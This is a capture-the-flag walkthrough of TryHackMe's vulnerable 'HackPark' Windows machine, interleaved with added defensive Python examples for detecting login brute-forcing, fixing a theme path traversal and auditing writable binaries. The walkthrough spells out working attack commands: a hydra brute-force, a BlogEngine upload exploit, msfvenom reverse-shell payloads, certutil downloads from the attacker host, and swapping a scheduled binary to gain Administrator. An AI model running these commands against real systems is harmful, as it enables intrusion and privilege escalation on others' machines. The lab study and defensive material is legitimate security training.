TryHackMe: HackPark
[Task 1] Deploy the vulnerable Windows machine
- Deploy the machine and access its web server.
Port Scan
nmap -Pn <ip>

High port scan
nmap -p1000- -Pn <ip>

Service and OS scan
nmap -A -p 80,3389 <ip>

Vulnerable scan
nmap -p 80,3389 --script vuln <ip>

This machine may be behind a filter or firewall, because only the plain port scan returns results.
Conclusion:
There are 2 services:
Port 80: Microsoft IIS?
Port 3389: Microsoft Remote Desktop?
I guess it's a Windows machine, because port 3389 is probably Remote Desktop Services.
2. What's the name of the clown displayed on the homepage?
Access HTTP site

[Task 2] Using Hydra to brute-force a login
- What request type is the Windows website login form using?
Let’s explore the site
Post section



Try SQL injection
1' or 1=1--+

SQL injection doesn't work.

Try XSS
<script>alert('XSS')</script>

XSS doesn't work either.

Archive section, not useful

Contact section
Try SQL injection

Seems like the form is not properly implemented.

Login section: this site uses "blogengine.net" (BlogEngine.NET).

The default credential is admin:admin

Let’s try it. Failed!!!

Let's find other directories with gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
I accessed many of the links, but they are the same as the other sections.

Let's check robots.txt; not much use.

Since there are no other ways left, I'll have to brute-force with hydra.
Create the user list first
echo admin > users.txt
echo pennywise >> users.txt
cat users.txt

Intercept login request w/ Burp Suite
It’s a POST request

2. Guess a username, choose a password wordlist and gain credentials to a user account!
Craft the hydra command: copy the request and change the username value to "^USER^" and the password value to "^PASS^"

Prepare hydra command
hydra -L <username list> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
Replace request

Run command

The credential is admin:1qaz2wsx.
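A detection-side counterpart to the Hydra run above, added here as an example and not part of the original writeup: it scans IIS W3C log lines for bursts of POSTs to the BlogEngine login page from one source and notes the first 302 (the redirect a successful login produces) inside the burst. The login path /Account/login.aspx, the field subset and the log lines are assumptions constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/account/login.aspx"   # assumed BlogEngine.NET login page; IIS paths are case-insensitive

# Constructed IIS W3C-style lines (a subset of the usual fields), not a real capture:
# one ordinary visitor, then a burst of POSTs from a single source that ends in a 302.
SAMPLE_LOG = "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status\n"
SAMPLE_LOG += "2020-05-01 10:00:00 GET /Account/login.aspx - 192.0.2.7 200\n"
SAMPLE_LOG += "2020-05-01 10:00:05 POST /Account/login.aspx - 192.0.2.7 302\n"
SAMPLE_LOG += "".join(
    f"2020-05-01 10:01:{i:02d} POST /Account/login.aspx - 198.51.100.9 200\n" for i in range(25)
)
SAMPLE_LOG += "2020-05-01 10:01:25 POST /Account/login.aspx - 198.51.100.9 302\n"


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_login_bursts(text, threshold=10, window_s=60):
    """Return {c-ip: (total_login_posts, first_302_time_or_None)} for every source
    that POSTs to the login page at least `threshold` times inside `window_s` seconds.
    A failed BlogEngine login re-renders the form with 200 (hydra's F=incorrect string);
    a success redirects with 302, so a 302 inside the burst marks a probable hit."""
    posts = defaultdict(list)                       # c-ip -> [(timestamp, status), ...]
    for rec in parse_w3c(text):
        if rec["cs-method"] == "POST" and rec["cs-uri-stem"].lower() == LOGIN_PATH:
            ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            posts[rec["c-ip"]].append((ts, rec["sc-status"]))
    hits = {}
    for ip, events in posts.items():
        events.sort()
        for i, (start, _) in enumerate(events):     # slide a window over this source's POSTs
            in_win = [e for e in events[i:] if e[0] - start <= timedelta(seconds=window_s)]
            if len(in_win) >= threshold:
                success = next((t for t, st in in_win if st == "302"), None)
                hits[ip] = (len(events), success)
                break
    return hits


if __name__ == "__main__":
    for ip, (count, success) in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs, probable success at {success}")
```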
[Task 3] Compromise the machine
- Now you have logged into the website, are you able to identify the version of the BlogEngine?
In the About section, BlogEngine is version 3.3.6.0.

2. Use the exploit database archive to find an exploit to gain a reverse shell on this system. What is the CVE?
I can use searchsploit instead of searching the site.
searchsploit blogengine

Copy it
searchsploit -m 46353

Review the script

3. Using the public exploit, gain initial access to the server.
Who is the webserver running as?
Edit the IP address and port number.

Save as PostView.ascx

Back to dashboard, click at Content -> Posts -> New

Click directory icon

Upload the script


Create listener
nc -lvp 1234

Access the uploaded script
http://<ip>/?theme=../../App_Data/files

Now I have a shell.

whoami
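Why the theme parameter above reaches the uploaded file, shown as an added example (a Python model written for this page, not BlogEngine's own C# code): the unsafe resolver joins the user-supplied name straight into the themes path, the hardened one beside it only accepts a bare directory name and verifies the result stays under the themes root. The web root and the Custom/Themes layout are assumptions; only the path arithmetic matters.

```python
import posixpath

# Assumed layout, modelled on BlogEngine.NET's Custom/Themes folder; the install
# path itself is a placeholder, only the path arithmetic matters here.
WEBROOT = "/inetpub/wwwroot"
THEMES_ROOT = posixpath.join(WEBROOT, "Custom", "Themes")


def resolve_theme_unsafe(theme):
    """Model of the flaw: the user-supplied ?theme= value is joined straight into
    the path, so '../../App_Data/files' climbs out of Custom/Themes into App_Data,
    where the blog keeps uploaded files, and the uploaded PostView.ascx is loaded."""
    return posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))


def resolve_theme_safe(theme, installed=None):
    """Hardened form: accept only a bare directory name (optionally one from an
    allow-list of installed themes) and verify the result stays under THEMES_ROOT.
    Raises ValueError for anything else."""
    if not theme or "/" in theme or "\\" in theme or theme in (".", ".."):
        raise ValueError(f"invalid theme name: {theme!r}")
    if installed is not None and theme not in installed:
        raise ValueError(f"unknown theme: {theme!r}")
    candidate = posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))
    if posixpath.commonpath([THEMES_ROOT, candidate]) != THEMES_ROOT:   # defence in depth
        raise ValueError(f"theme path escapes themes root: {candidate}")
    return candidate


def theme_is_accepted(theme, installed=None):
    """True if the hardened resolver would serve this theme name."""
    try:
        resolve_theme_safe(theme, installed)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(resolve_theme_unsafe("../../App_Data/files"))   # ends in /App_Data/files/PostView.ascx
    print(theme_is_accepted("../../App_Data/files"))      # False
```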

[Task 4] Windows Privilege Escalation
- Our netcat session is a little unstable, so let's generate another reverse shell using msfvenom.
Reference: https://netsec.ws/?p=331
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Create HTTP Server
python -m SimpleHTTPServer 80

Back to the victim's machine, download the file
cd \Windows\Temp
certutil -urlcache -f http://<ip>/shell.exe shell.exe
dir

Also, I download winPEAS.exe in case I need it later.
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe

Back to the attacker's machine, set up the metasploit handler
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run

Back to victim’s machine, run shell.exe
shell.exe

Back to attacker’s machine, now I have a shell.

2. What is the OS version of this Windows machine?
sysinfo

3. What is the name of the abnormal service running?
Try to escalate privileges
getsystem
Seems like this method doesn't work.

run post/multi/recon/local_exploit_suggester

I'll try running these exploits.
background

use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run
Failed!!!

I tried the other exploits too, but every one of them failed. I have to find another way.
4. What is the name of the binary you're supposed to exploit?
I need to run WinPEAS.
shell

winPEAS.exe

Seems like there are errors. I need to run the simpler script, winPEAS.bat.

Download winPEAS.bat
certutil -urlcache -f http://10.11.11.30/winPEAS.bat winPEAS.bat

winPEAS.bat

5. Using this abnormal service, escalate your privileges! What is the user flag (on Jeffs Desktop)?
cd Program Files (x86)
cd SystemScheduler
dir

cd Events
dir

Read the log file
type 20198415519.INI_LOG.txt
The log shows Message.exe being run by the scheduler as Administrator.
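The root cause here is a scheduled job that runs Message.exe as Administrator from a directory that ordinary users can write to, which is what a defender should audit for. As an added example (not from the writeup), this parses `icacls` output and flags files that any local account can replace; the sample output is constructed to mirror the SystemScheduler directory above, and Sample.exe is a placeholder file name.

```python
import re

# Rights that let a principal overwrite or replace the file (icacls simple and specific forms)
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WDAC", "WO", "DC"}
# Principals every local account is a member of; write rights here mean "anyone can replace it"
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users"}

# One ACE per line: an optional UPPER-CASE domain, a name, then (flags)(rights).
# The first line of each file also starts with its path; the lookbehind keeps the
# principal from being matched inside path segments such as "Program Files (x86)".
ACE_RE = re.compile(r"(?<![^\s])(?P<who>(?:[A-Z][A-Z0-9 ]*\\)?[^\\:()]+):(?P<perms>(?:\([^)]*\))+)\s*$")

# Constructed icacls output for the directory from the writeup, not a real capture:
# Message.exe is fully writable by BUILTIN\Users, the placeholder Sample.exe only readable.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\SystemScheduler\Message.exe BUILTIN\Users:(I)(F)
                                                   NT AUTHORITY\SYSTEM:(I)(F)
                                                   BUILTIN\Administrators:(I)(F)
C:\Program Files (x86)\SystemScheduler\Sample.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                  BUILTIN\Administrators:(I)(F)
                                                  BUILTIN\Users:(I)(RX)

Successfully processed 2 files; Failed processing 0 files
"""


def parse_icacls(output):
    """Yield (path, principal, {rights}) for every ACE in `icacls` output."""
    path = None
    for line in output.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue                                  # blank line or the trailing summary
        if not line[0].isspace():                     # first ACE line also carries the path
            path = line[:m.start()].rstrip()
        rights = {r for grp in re.findall(r"\(([^)]*)\)", m["perms"]) for r in grp.split(",")}
        yield path, m["who"], rights


def writable_by_any_user(output):
    """Paths on which an everyone-class principal holds a write-capable right.
    A binary that the scheduler runs as Administrator must never appear here."""
    return sorted({p for p, who, rights in parse_icacls(output)
                   if who.lower() in LOW_PRIV and rights & WRITE_RIGHTS})


if __name__ == "__main__":
    # On the host: icacls "C:\Program Files (x86)\SystemScheduler\*" > acl.txt, then feed the text in.
    for path in writable_by_any_user(SAMPLE_ICACLS):
        print("writable by any user:", path)
```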

Copy Message.exe as a backup in case I screw up.
cd ..
copy Message.exe Message_bak.exe

I need to replace Message.exe with a malicious file.
Back to attacker’s machine, create another shell file.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe

Create listener
nc -lvp 1236

Download Message.exe
certutil -urlcache -f http://10.11.11.30/Message.exe Message.exe

Back on the attacker's machine, at the port 1236 listener, wait a moment

whoami
Seems like I can’t run this command.

Run whoami alternative
echo %username%
I’m root/Administrator.

cd \Users\jeff\Desktop
dir
type user.txt

6. What is the root flag?
cd \Users\Administrator\Desktop
type root.txt
